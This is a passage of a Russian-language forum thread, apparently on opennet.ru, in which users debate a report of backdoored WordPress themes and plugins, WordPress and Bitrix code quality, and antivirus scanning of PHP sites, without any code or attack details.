Ответить | Правка | Наверх | Cообщить модератору
Родитель: #100 Ответы: #104

103. Сообщение от Аноним (12), 23-Янв-22, 01:12   +1 +/
Если троян в теме, то при чём тут WordPress?
У вас там с логикой всё в порядке?

Могу даже подсказку дать: не надо ставить тему с троянами, и проблемы не будет.

Ответить | Правка | Наверх | Cообщить модератору
Родитель: #98 Ответы: #112

104. Сообщение от Аноним (12), 23-Янв-22, 01:16   +/
Чтобы система была полностью защищённой от бэкдоров, она должна быть полностью защищена от запуска в ней стороннего кода.
Поэтому ни тем, ни плагинов под ней не будет.

И кому нужна система без тем и плагинов?

Ответить | Правка | Наверх | Cообщить модератору
Родитель: #102 Ответы: #109, #149

105. Сообщение от AskerTVemail (ok), 23-Янв-22, 01:19   +/
>[оверквотинг удален]
> тему, и получаете обещанный килорубль.
> При этом, если у вас нет ограничения на предельную глубину файлового дерева,
> к которой имеют доступ php-скрипты, все сайты под вашей учётной записью
> на этом хостинге окажутся скомпрометированы: среди сотен php-скриптов будут как левые,
> содержащие некое подобие шелла и/или бд-клиента, так и штатные, дополненные аналогичными
> бэкдорами (как в данном случае).
> А для WP ограничить глубину файлового дерева нельзя, потому как иначе невозможен
> будет залив картинок и других вложений.
> Мораль басни: не используйте левые скрипты из непроверенных источников, включая заказчиков
> на биржах фриланса.

Так дело в том, что это я сам скачал WP и установил на свой хостинг (VDS). Потом, пару раз менял VDS-сервер. Архив с копиями сайтов, был где то на диске локального компа. Как то запустил сканирование на вирусы, и сканер нашёл эти скрипты, указав, что это потенциально опасные штуки. Так я узнал, что на одном из VDS, была дыра. После этого, я проверил свои веб-папки. Нигде не встретил подобного случая.

Ответить | Правка | Наверх | Cообщить модератору
Родитель: #99 Ответы: #127

106. Сообщение от IRASoldier_registered (ok), 23-Янв-22, 01:50   +/
Ну да. Пихают нанятые "веб-разработчики", научившиеся в шарашках "фулл-стек за три месяца! только сегодня скидка 60% на весь курс!" всякий шлак в сайт заказчика - но УГ именно Вордпресс, как же иначе-то.

Ответить | Правка | Наверх | Cообщить модератору
Родитель: #5 Ответы: #113, #131

108. Сообщение от Аноним (108), 23-Янв-22, 04:15   +/
PHP - жив!
Ответить | Правка | Наверх | Cообщить модератору

109. Сообщение от Роман (??), 23-Янв-22, 06:26   +/
Тут благодатная почва - некоторые на данном ресурсе утверждают что им и смартфон то не нужен нынче, весь их мир прост и заранее предсказуем, браузинг в стиле lynx их устраивает. Таким людям конечно никакие темы не нужны, им вообще мало что нужно.
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #104

110. Сообщение от Аноним (113), 23-Янв-22, 08:39   +1 +/
Всё ясно ты солевик больше не заходи сюда больше. Каким образом это окно тебе помешает сделать скриншот. Да даже просто работать неограниченно время оно никак не мешает никому.  
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #69 Ответы: #122

112. Сообщение от Аноним (113), 23-Янв-22, 08:42   +/
А зачем тебе вордпресс без тем?
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #103

113. Сообщение от Аноним (113), 23-Янв-22, 08:44   –2 +/
Почему в той же джанге нет таких проблем, хотя их клепают точно такие же курсовики? Да потому что вордпресс — дерьмo мамонта.  
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #106 Ответы: #133

114. Сообщение от Zenitur (ok), 23-Янв-22, 11:22   +1 +/
> на 360 тысячах сайтов

Кто-нибудь знает хотя бы 30 тысяч сайтов?

Ответить | Правка | Наверх | Cообщить модератору
Ответы: #119

115. Сообщение от Аноним (23), 23-Янв-22, 12:55   +/
Вот и имеем 360 000 затрояненных сайтов. Зато богатая экосистема плагинов, а не помойка. Вы обязательно продолжайте ваше мнение очень важно для нас.  
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #78

116. Сообщение от Аноним (23), 23-Янв-22, 12:56   +2 +/
Сколько троянов в своём вордпрессе уже нашел? Ой так ты их и не искал, ты троянов специально разводишь как тараканов.  
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #83

117. Сообщение от Аноним (23), 23-Янв-22, 12:59   +1 +/
Проактивная защита, Проактивная, Карл!  После таких комментариев вера в пыхеров полностью исчезает.  Зачем вообще она нужна в чем-то безопасном.

Это я уже не говорю что заявления: «Я удалил антивирус, поэтому у меня нет вирусов» это пять я считаю. Продолжайте в том же духе.  

Ответить | Правка | Наверх | Cообщить модератору
Родитель: #89 Ответы: #120

118. Сообщение от Аноним (23), 23-Янв-22, 13:00   +/
Конечно же это последние вирусы в плагинах и уязвимости в вордпрессе. Теперь заживём. Ор выше гор.  
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #84

119. Сообщение от Аноним (23), 23-Янв-22, 13:07   +1 +/
Любой сайт купи окна, или стрижка собак.  Всем нужен сайт потому что соцсети это выше их ЧСВ.  
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #114 Ответы: #135

120. Сообщение от suffix (ok), 23-Янв-22, 13:08   +/
1.

Не я так модуль назвал так что не по адресу :)

2.

Я не использую этот модуль так как использую modsecurity и антивирус мне не нужен так как сайт на выделенном сервере (не vps), других юзеров на сервере кроме меня нет, пользовательского контента нет, никто ничего загрузить не может.

Так что уважаемый Карл поумерьте свой пыл :)

Ответить | Правка | Наверх | Cообщить модератору
Родитель: #117

121. Сообщение от Аноним (23), 23-Янв-22, 13:09   +1 +/
Сразу в голове пыхеров это через три месяца.  А сколько осталось, а сколько не нашли. Пыхеры неисправимы, неудивительно что над ними все ржут.  
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #85

122. Сообщение от Аноним (-), 23-Янв-22, 15:07   +/
> больше не заходи сюда больше

ну и не буду

Ответить | Правка | Наверх | Cообщить модератору
Родитель: #110

123. Сообщение от Аноним (9), 23-Янв-22, 16:16   +/
Тебе topin89 предложил это. Ты у него спроси конкретно. А когда он тебе расскажет, ты сможешь вставить их на сайт, который ты пишешь.

Да, ты не в теме - Wt к HPH отношения не имеет. Ты должен изучить тему прежде, чем ты будешь выражать мнение.

Ответить | Правка | Наверх | Cообщить модератору
Родитель: #72

124. Сообщение от Аноним (-), 23-Янв-22, 16:18   +/
latex, gimp - наше все. остальное для извращенцев
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #63

125. Сообщение от anonymous (??), 24-Янв-22, 00:11   +/
Крупная компания, которая держит гомогенный парк серверов и начинки в них. Ты доволен? Сначала написать на Си, потом раздебажить, оптимизировать вручную. А затем и переписать с нуля на ассемблере. Типа нереально?
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #72 Ответы: #132

126. Сообщение от anonymous (??), 24-Янв-22, 00:20   +1 +/
Классика, не? Сломали supply chain. Вывод только один - нужно популяризировать альтернативные решения, написанные не на PHP, Ruby или JavaScript. И писать самостоятельно с нуля.
Ответить | Правка | Наверх | Cообщить модератору
Ответы: #129

127. Сообщение от Capra (ok), 24-Янв-22, 00:24   +/
Чем сканировали? Какой Антивирус разбирает php код?
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #105 Ответы: #137

128. Сообщение от мое правило (?), 24-Янв-22, 01:59   +/
Сейчас верстая по современному вы стянете половину npm. А там такая же дырень как и вордпрес.
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #43

129. Сообщение от Аноним (91), 24-Янв-22, 02:11   +1 +/
> И писать самостоятельно с нуля.

Мудрое решение. Современные фрейм(нон)ворки настолько сложны в своём интерфейсе, а в итоге просто неповоротливые, что проще, быстрее, надёжнее, дешевле, гибче самому написать, чем пытаться засунуть коня в сферический вакуум.

Ответить | Правка | Наверх | Cообщить модератору
Родитель: #126 Ответы: #136

130. Сообщение от Аноним (130), 24-Янв-22, 03:38   +4 +/
Пользователи WP должны постоянно страдать. Ситуация когда сайт на WP работает является труднообъяснимым отклонением от нормы.
Ответить | Правка | Наверх | Cообщить модератору
Ответы: #145

131. Сообщение от Аноньимъ (ok), 24-Янв-22, 06:07   +/
Разве не именно для этого и существует вордпресс?
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #106 Ответы: #134

132. Сообщение от Ordu (ok), 24-Янв-22, 07:52   +1 +/
Типа нереально. При попытке сделать так возникает куча проблем организационного и экономического толка. Например, привязка к этой гомогенности. Пройдёт лет пять, и железо потребуется обновлять или расширять, но в случае заточенного под конкретную железку кода, вариант со сменой железа станет гораздо дороже. То есть, сильно затачиваясь на что-то, мы приносим в жертву будущую гибкость принятия решений. Стоит ли оно того?

А тут мы подходим к проблеме бюрократии и разделения ответственности за принятие решений. Это в принципе большая и сложная организационная проблема: часто при принятии решения основные риски берёт на себя не тот, кто квалифицирован в достаточной мере, чтобы принимать такое решение. Например, рискующим больше всех может быть инвестор. А достаточно квалифицированным может быть менеджер среднего звена. И как? На этого менагера невозможно свалить финансовые риски, связанные с решением. А попытка вынудить инвестора принять риски будет связана с тем, что инвестор должен будет _поверить_ специалистам, что риск стоит того. А если решение окажется неудачным? Доверию придёт конец. CEO уволят, а может не только его. Кому это надо?

Или другая проблема: кто будет оптимизировать так код? Крутой спец, этт понятно, но каким будет его положение в организации? Рядовой девелопер? Чем он будет заниматься после окончания деятельности по созданию такой оптимизированной реализации? Если мы не найдём ему полезной (aka приносящей денег) деятельности, то он будет висеть на организации мёртвым грузом: зарплату получает, денег не приносит. Если же мы его уволим, то что будем делать в случае проблем с его кодом?

В каких-то специальных случаях может быть выгодно так оптимизировать. В криптомайнинге, например. Но во многих-многих других проще (и дешевле, и надёжнее) купить больше железа.

> Типа нереально?

Хорошей эвристикой реальности или нереальности какого-то замысла являются примеры успешной реализации этого замысла. Настолько хорошей, что когда какой-то замысел кажется удачным, но ты не видишь примеров его реализации, то дефолтным выводом твоим должен быть вывод о нереальности замысла. Дефолтным -- это в том смысле, что другой вывод возможен только после того, как ты нашёл объяснение наблюдаемому отсутствию реализаций замысла.

Ответить | Правка | Наверх | Cообщить модератору
Родитель: #125

133. Сообщение от IRASoldier_registered (ok), 24-Янв-22, 09:22   –2 +/
> потому что вордпресс — дерьмo мамонта

Ты из гибернации давно вышел? Поинтересуйся, когда вышла свежая версия вордпресса.

Ответить | Правка | Наверх | Cообщить модератору
Родитель: #113

134. Сообщение от IRASoldier_registered (ok), 24-Янв-22, 09:23   –2 +/
Вордпресс существует для того, чтобы делать на нем сайты, подсказывает Кэп.


Ответить | Правка | Наверх | Cообщить модератору
Родитель: #131 Ответы: #142

135. Сообщение от Онаним (?), 24-Янв-22, 09:49   +1 +/
Потому что в соцсетях 99% - сопливые подростки, которые прибыль приносят только донатным игроделам.
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #119

136. Сообщение от Альтернативно одаренный (?), 24-Янв-22, 10:09   +/
А через два года вашу лапшу никто не хочет брать на доработку, классика
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #129

137. Сообщение от AskerTVemail (ok), 24-Янв-22, 11:00   +/
> Чем сканировали? Какой Антивирус разбирает php код?

Точно не помню, но по моему, это был стандартный Windows-10 антивирус. Я запустил сканирование, и антивирус нашёл этот код.

Ответить | Правка | Наверх | Cообщить модератору
Родитель: #127

138. Сообщение от Аноним (138), 24-Янв-22, 11:28   +/
Это тот кусок протухшего кода, который создает php файлик при создании пользователем страницы, да и вообще весь движок должен лежать кишками наружу, с сотнями тысяч точек входа и все это доступно на запись, где большая часть кода не документирована, где нет консольных инструментов для проверки целостности и переустановки, где все спроектировано так, чтобы конечное приложение нельзя было автоматически разворачивать и тестировать?
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #87 Ответы: #139

139. Сообщение от suffix (ok), 24-Янв-22, 11:34   –1 +/
Вы просто не умеете его готовить :)

Разумеется для сайта визитки Битрикс избыточен, разумеется для крупного кластерного решения Битрикс тоже не подходит, но для "среднего" звена по соотношению цена/качество Битрикс очень даже неплох (несмотря на огромное количество недостатков).


Ответить | Правка | Наверх | Cообщить модератору
Родитель: #138 Ответы: #143

140. Сообщение от lockywolf (ok), 24-Янв-22, 13:14   –1 +/
Уже есть самая правильная CMS на свете -- Битрикс.
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #6

141. Сообщение от Аноним12345 (?), 24-Янв-22, 13:27   +1 +/
Распиаренный ворд-пресс настолько дыряв, что я даже не удивлен
Ответить | Правка | Наверх | Cообщить модератору

142. Сообщение от Аноним (142), 24-Янв-22, 13:29   +/
Вордпресс существует для того, чтобы дегенераты тоже могли делать сайты. я тебя немного поправил, маняКэп, не благодари.
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #134 Ответы: #153

143. Сообщение от Аноним (138), 24-Янв-22, 13:44   +/
> Вы просто не умеете его готовить :)

Не умею и людей умеющих в природе не встречал, хотя многие до сих пор пытаются, у некоторых даже получается сделать так чтобы от первого взгляда не тянуло блевать от кода.

> Разумеется для сайта визитки Битрикс избыточен, разумеется для крупного кластерного решения
> Битрикс тоже не подходит, но для "среднего" звена по соотношению цена/качество
> Битрикс очень даже неплох (несмотря на огромное количество недостатков).

Видел не мало крупных проектов на этом продукте, даже без кластера, на одном толстом сервере, это превращается в неподдерживаемое нечто. Из плюсов там разве что готовые интеграции, которые чаще всего не работают из коробки, и готовые решения, которые тоже чаще не работают как надо.


Ответить | Правка | Наверх | Cообщить модератору
Родитель: #139 Ответы: #146

144. Сообщение от Аноним (144), 24-Янв-22, 14:07   +/
Емакс тут осилит мало кто.
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #17

145. Сообщение от Аноним (144), 24-Янв-22, 14:08   +/
То есть это западный кусочек 1с?
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #130 Ответы: #147

146. Сообщение от suffix (ok), 24-Янв-22, 14:18   +/
> которые чаще всего не работают из коробки

То что нужна после сборки обработка напильником это наша общенациональная фича а не недостаток Битрикса :)

Ответить | Правка | Наверх | Cообщить модератору
Родитель: #143 Ответы: #150

147. Сообщение от Аноним (138), 24-Янв-22, 17:02   +1 +/
> То есть это западный кусочек 1с?

Вообще это удивительный продукт, у вордпреса не самый плохой интерфейс, у его расширений бывает очень крутой интерфейс и функционал, но сам код вопрдпреса, при том, что он открытый - это просто ппц, даже хуже битрикса, хотя по кол-ву отвратительного кода битрикс не переплюнуть.

Ответить | Правка | Наверх | Cообщить модератору
Родитель: #145

148. Сообщение от Аноним (138), 24-Янв-22, 17:08   +1 +/
Никогда не понимал тех, кто в своих проектах прикручивает к шаблонизатору php шаблонизатор, но когда вопрос в установке сторонних шаблонов - тут даже обсуждать нечего, надо было позаботиться об отдельном шаблонизаторе, а не давать каждому шаблоничку полный доступ.
Ответить | Правка | Наверх | Cообщить модератору

149. Сообщение от Аноним (138), 24-Янв-22, 21:06   +/
Для тем не обязально давать использовать тьюринг полный интерпретатор.
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #104

150. Сообщение от Аноним (138), 25-Янв-22, 11:55   +1 +/
Выпускать сырые продукты - это наша общенациональная бага, а не фитча, текущий битрикс, без полной документации апи - еще один пример сырого продукта, где кроме маркетологов никто не работает.
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #146 Ответы: #151

151. Сообщение от suffix (ok), 25-Янв-22, 12:00   +/
А вот сейчас соглашусь с Вами.

Я вот в их модуле "Блоги" нашёл баг который вообще не позволяет модулем пользоваться - 4 раз уже в ТП обращался - баг подтверждают, но уже ГОД не чинят - пишут что неприоритетная задача :(

Ответить | Правка | Наверх | Cообщить модератору
Родитель: #150

153. Сообщение от IRASoldier_registered (ok), 01-Фев-22, 09:03   +/
Иди и ещё понаслаждайся ощущением своей невклепенной элитарности. Тем временем кто-то где-то заливает на хостинг ещё один сайт на Вордпрессе и забавно то, что ты с этим ничего поделать не можешь :-) Более того, когда ты это будешь читать - за это время будет залито еще несколько сайтов на Вордпрессе. И тем, кто это делает, совершенно до болта, что какой-то русскоязычный аноним считает их дегенератом. Более того, они об этом даже не узнают. Прочувствуй это. (И вот когда ты это уже дочитал - количество сайтов на Вордпрессе в Интернете опять прибавилось, однако.)

Ответить | Правка | Наверх | Cообщить модератору
Родитель: #142

154. Сообщение от Аноним (154), 05-Фев-22, 20:56   +/
Возможно тут не java, а дырявый javascript
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #37


Архив | Удалить

Рекомендовать для помещения в FAQ | Индекс форумов | Темы | Пред. тема | След. тема




Партнёры:
PostgresPro
Inferno Solutions
Hosting by Hoster.ru
Хостинг:

Закладки на сайте
Проследить за страницей
Created 1996-2024 by Maxim Chirkov
Добавить, Поддержать, Вебмастеру